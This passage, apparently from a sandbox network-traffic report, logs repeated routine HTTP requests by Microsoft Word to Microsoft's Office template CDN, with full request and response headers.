    x-ms-request-id: 45ea03cb-501e-000a-5e97-a02e9d000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328916.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 26944
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: +RPdhJFXUwQthWzsTl2rpQ==
    Last-Modified: Fri, 22 Apr 2016 16:09:47 GMT
    ETag: 0x8D36AC886C4C4EE
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 621faa23-601e-00ca-3c97-a0d6a3000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0403391901.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 1097591
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: v5XpZ+fRzsjv5Ca8ASfT3g==
    Last-Modified: Wed, 29 Aug 2018 18:16:09 GMT
    ETag: 0x8D60DDB7EAA50F0
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: ceee4029-b01e-00bb-2c97-a03088000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328919.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 22149
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: ZsUZnPT7GL1Pnz8sywdABw==
    Last-Modified: Fri, 22 Apr 2016 16:09:48 GMT
    ETag: 0x8D36AC8871139C3
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 19a4ffc9-101e-0104-2197-a0f920000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03998159.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 3417042
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: dJw2FeVMjmh1UYz9hOWhsg==
    Last-Modified: Fri, 22 Apr 2016 16:11:19 GMT
    ETag: 0x8D36AC8BD7E1FE9
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: f0fd4826-d01e-00cf-6997-a00478000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328925.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 25314
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: xH40MK+BPfiwLhy0gp3ZSw==
    Last-Modified: Fri, 22 Apr 2016 16:09:48 GMT
    ETag: 0x8D36AC8875AEF5A
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 2f99a54d-f01e-011c-6c97-a02647000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0403391701.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 698244
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 4pziZjpWoUROqjcy/7gpQA==
    Last-Modified: Wed, 29 Aug 2018 18:15:39 GMT
    ETag: 0x8D60DDB6CAEA91D
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: d7f1c987-e01e-001f-2f97-a0392e000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328932.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 20554
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: SGy8siO4cxMv+vS4rQrQRA==
    Last-Modified: Fri, 22 Apr 2016 16:09:49 GMT
    ETag: 0x8D36AC887A4CC19
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 867275a6-c01e-0037-5197-a05886000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0403393701.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 3256855
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: iGe99fx1Tanab1ujQTNFlQ==
    Last-Modified: Wed, 29 Aug 2018 18:19:43 GMT
    ETag: 0x8D60DDBFE4BB50C
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 2e9528c9-a01e-0031-2697-a06b39000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328935.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 23597
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: fGRexQWYL+Up0OUDWzeP/A==
    Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
    ETag: 0x8D36AC49996C1E0
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 8477cc39-f01e-00df-0497-a0693d000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0403392901.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 1766185
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: go+WAx9Av468teUqrut+TA==
    Last-Modified: Wed, 29 Aug 2018 18:21:39 GMT
    ETag: 0x8D60DDC4354B7FB
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: ec9a4660-301e-00c7-1297-a01e77000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328940.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 21791
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: e/iLPKIOtx7UU6M2GQjgEA==
    Last-Modified: Fri, 22 Apr 2016 16:09:50 GMT
    ETag: 0x8D36AC8883A8134
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: a209c057-f01e-003c-3797-a0a3ed000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328951.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 19893
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 75y4vfvAjwO+9RmtZrpkLw==
    Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
    ETag: 0x8D36AC499DEA2B6
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 6d64632e-601e-003f-4597-a08fb5000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328972.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 21111
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 0wrSbbtt7KT90pT0jtrVXQ==
    Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
    ETag: 0x8D36AC49A0B8087
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 61a54fca-701e-0020-6497-a054a5000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328975.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 22594
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 7gEpx8waySu8PWyw9lP8rg==
    Last-Modified: Fri, 22 Apr 2016 15:41:42 GMT
    ETag: 0x8D36AC49A2D135E
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: e960e28b-801e-0094-6497-a058a7000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328983.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 21875
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 5TIDh2JQP/oTcd8D+i4iLQ==
    Last-Modified: Fri, 22 Apr 2016 15:41:42 GMT
    ETag: 0x8D36AC49A5E8527
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: d7553c9d-c01e-0032-5897-a060b9000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328986.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 22340
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: iyn6tQb9ZcIcnNb+a7vBRg==
    Last-Modified: Fri, 22 Apr 2016 16:09:52 GMT
    ETag: 0x8D36AC889AD573C
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 428c9efa-801e-0139-1297-a08f3b000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:13 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328990.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 19288
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: uab/cVcZ7p3hZCGrmDynRQ==
    Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
    ETag: 0x8D36AC88A1DF716
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 6d182899-901e-0083-4897-a09448000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328998.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 21357
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: l/W3t+nhKBmZRopcQssS5w==
    Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
    ETag: 0x8D36AC88A7F05EE
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 8e84b2b1-401e-004b-3297-a07679000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345746401.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 276650
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: hNjzhI50JMvjgB+VcOBQGA==
    Last-Modified: Wed, 29 Aug 2018 18:16:15 GMT
    ETag: 0x8D60DDB82865741
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 56e4750e-f01e-010c-3897-a0e32f000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345744402.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 295527
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: mgcDXvgCv4n27SVNDbAqsA==
    Last-Modified: Wed, 29 Aug 2018 21:59:16 GMT
    ETag: 0x8D60DFAA9CC48C3
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 986c5e3d-201e-011e-4897-a0a4d1000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345747501.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 271273
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: IUN4l8m4isLLK7L++SLRkQ==
    Last-Modified: Wed, 29 Aug 2018 18:16:49 GMT
    ETag: 0x8D60DDB96BDF60C
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 41deec0d-a01e-0098-7197-a0aa4b000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
